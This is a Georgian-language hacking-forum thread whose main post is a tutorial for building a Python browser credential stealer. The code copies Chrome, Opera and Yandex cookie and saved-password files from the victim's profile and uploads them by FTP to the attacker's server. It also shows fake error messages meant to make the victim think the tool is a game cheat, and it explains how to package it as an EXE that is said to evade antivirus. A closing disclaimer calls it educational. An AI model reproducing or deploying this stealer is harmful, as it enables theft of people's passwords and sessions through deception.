მოგესალმებათ CYBSECGROUP ფორუმი
№1 კიბერ ფორუმი საქართველოში, თქვენ გაქვთ შესაძლებლობა გაეცნოთ საინტერესო პროექტებს, საინტერესო გარემოში
რეგისტრაცია

ვწერთ საკუთარ პაროლების სტილერს PYTHON ში

SIMBIOS

R00T 😈
დრუიდი
ივნ 24, 2018
57
105
#1
CSGSTEALER.png
გამარჯობათ დღევანდელ სტატიაში აღვწერ თუ როგორ დავწეროთ აროლების სტილერს PYTHON ში. ანტივირუსების დეტექტი წარმოადენს ( 1/67 ) ისიც სერთიფიკატის გარეშე რომ არის მაგიტომ :)
დავიწყოთ თავიდან ბიბლიოთეკების იმპორტით
Python:
import os.path
import getpass
from ftplib import FTP
import random
con = FTP("ჰოსტი","მომხმარებელი","პაროლი")
  • პირველი ბიბლიოთეკა ( os.path ) - გამოიყენება დირექტორიების ვალიდაციისთვის არსებობს თუ არა დირექტორია
  • მეორე ბიბლიოთეკა ( getpass ) - გამოიყენება მომხამრებლის ახელის ამოღება რომელითაც გაშვებულია პრცესი ეს საჭიროა იმისთვის რომ მივიღოთ წვდომა AppData ზე
  • მესამე ბიბლიოთეკა ( ftplib ) - გამოიყენება FTP ზე პაროლების გასაგზავნად
  • მეოთხე ბიბლიოთეკა ( random ) - გამოიყენება ფაილის სახელელსი რანდომიზაციისთვის რომელიც სერვერზე იგზავნება


და ბოლოს ვუკავშირდებით FTP ის .

შემდგომ გადავდივართ პრცესის საინტერესო ნაწილზე ვიდრე ბიბლიოთეკებია, ვწერთ დირექტორიების მიამრთებს სადაც პაროლების ფაილია მოთავსებული Opera, Yandex, Google Chrome

Python:
UserName = '\\' + getpass.getuser()
dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'
dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"

dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"
dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"

dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"
dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"
UserName იღებს მიმიდნარე მომხამრებლის მნიშვნელობას.

dir_cookie_google, dir_pass_google, ...., ... ეს დირექტორიებია სადაც ინახება პაროლები ჩვენს შემთხვევაში მხოლოდ 3 ბრაუზერია რომლებისგანაც წამოვიღებთ cookie ებს და პაროლსებს რის შემდეგ ვაგზავნით სერვერზე.


ახალა დროა გადავიდეთ ძირითად კოდზე

Python:
dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"
dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"
dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"
dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

def check():
    if (os.path.exists(dir_google)) == True:
        filename = "google"+str(random.randint(1, 10000))
        filename2 = "google_pass" + str(random.randint(1, 10000))
        with open(dir_cookie_google, "rb") as content:
            con.storbinary("STOR %s" % filename, content)
        with open(dir_pass_google, "rb") as content:
            con.storbinary("STOR %s" % filename2, content)
    if (os.path.exists(dir_opera)) == True:
        filename = "opera"+str(random.randint(1, 10000))
        filename2 = "opera_pass" + str(random.randint(1, 10000))
        with open(dir_cookie_opera, "rb") as content:
            con.storbinary("STOR %s" % filename, content)
        with open(dir_pass_opera, "rb") as content:
            con.storbinary("STOR %s" % filename2, content)
    if (os.path.exists(dir_yandex)) == True:
        filename = "yandex"+str(random.randint(1, 10000))
        filename2 = "yandex_pass" + str(random.randint(1, 10000))
        with open(dir_cookie_yandex, "rb") as content:
            con.storbinary("STOR %s" % filename, content)
        with open(dir_pass_yandex, "rb") as content:
განვიხილოთ პრიველი ხაზები: ფუნქციის დაწყებამდე ჩვენ გავწერთ ცვლადში დირქტორიების მისამართებს შემდგომი თანმიმდევრობის შესამოწმებლად.
შემდგომ გვაქვს ფუნქცია მრავალი if ებით, ამ შემთხვევაში აქ არაფერია რთული
Python:
if (os.path.exists(dir_google)) == True:
    filename = "google"+str(random.randint(1, 10000))
    filename2 = "google_pass" + str(random.randint(1, 10000))
    with open(dir_cookie_google, "rb") as content:
        con.storbinary("STOR %s" % filename, content)
    with open(dir_pass_google, "rb") as content:
        con.storbinary("STOR %s" % filename2, content)
ჩვენ ჯერ ვამოწმებთ დირექოტორია ვალიდურია თუ არა და შემდგომ ვხსნით მასე და ვაგზავნით საჭირო ფაილებს სერვერზე. ახლა გვიჭრდება რაიმე შეცდომის გამოტანა მაგალითად ბიბლიოტეკა ვერ დაუკავშირდა

Python:
check()
print("Error library import HOUII.dll")
print("Error RUN cheat")
input()
ამას ვშვრებით რადგანაც მომხაერებელმა იფქროს რომ პროგრამია უსაფრთხოა და არ წარმოადგენს საფრთხეს.

სრული კოდი:
Python:
import os.path
import getpass
from ftplib import FTP
import random

con = FTP("ჰოსტი","მომხამრებელი","პაროლი")

"""
Hack to directory
"""

UserName = '\\' + getpass.getuser()

dir_cookie_google = 'C:\\Users'+UserName+'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'
dir_pass_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
dir_cookie_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Cookies"
dir_pass_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Password Checker"
dir_cookie_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies"
dir_pass_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"
dir_google = "C:\\Users"+UserName+"\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies"
dir_firefox = "C:\\Users"+UserName+"\\AppData\\Roaming\\Mozilla\\Firefox"
dir_yandex = "C:\\Users"+UserName+"\\AppData\\Local\\Yandex"
dir_opera = "C:\\Users"+UserName+"\\AppData\\Roaming\\Opera Software"

def check():
    if (os.path.exists(dir_google)) == True:
        filename = "google"+str(random.randint(1, 10000))
        filename2 = "google_pass" + str(random.randint(1, 10000))
        with open(dir_cookie_google, "rb") as content:
            con.storbinary("STOR %s" % filename, content)
        with open(dir_pass_google, "rb") as content:
            con.storbinary("STOR %s" % filename2, content)
    if (os.path.exists(dir_opera)) == True:
        filename = "opera"+str(random.randint(1, 10000))
        filename2 = "opera_pass" + str(random.randint(1, 10000))
        with open(dir_cookie_opera, "rb") as content:
            con.storbinary("STOR %s" % filename, content)
იმსთვის რომ ვაქციოთ EXE დ გამოვიყენოთ pyinstaller ი

ვიწერთ
Python:
pip install pyinstaller
ვაკომპილრებთ

Python:
pyinstaller -F <my_script>.py
მადლობა ყურადღებისთვის :)

სტატია დაწერილია შემეცნებითი მიზნებისთვის ფორუმი და ავტორი არ არის პასუხისმგებელი მის ბოროტულად გამოყენების შემთხვევაში
 
Last edited:
მოწონებები: Lucifer, W0RLD3ND3R, Z3R0 and 3 others

theodous

SuperUser 🐱‍💻
CSG Member
აპრ 12, 2019
17
1
#4
მეგრებო კოდინგის ტუტორლაბიც დადეთ მერე რა გთხოვთ,როგორც დამწყები ასევე ედვანსდ
 

Z3R0

Hacktivist 🌐
ადმინისტრაცია
ადმინისტრატორი
აგვ 9, 2018
97
161
Hell ·
#5
მეგრებო კოდინგის ტუტორლაბიც დადეთ მერე რა გთხოვთ,როგორც დამწყები ასევე ედვანსდ
გვაქვს პითონის გაკვეთილები ჩვენს იუთუბ არხზე ^_^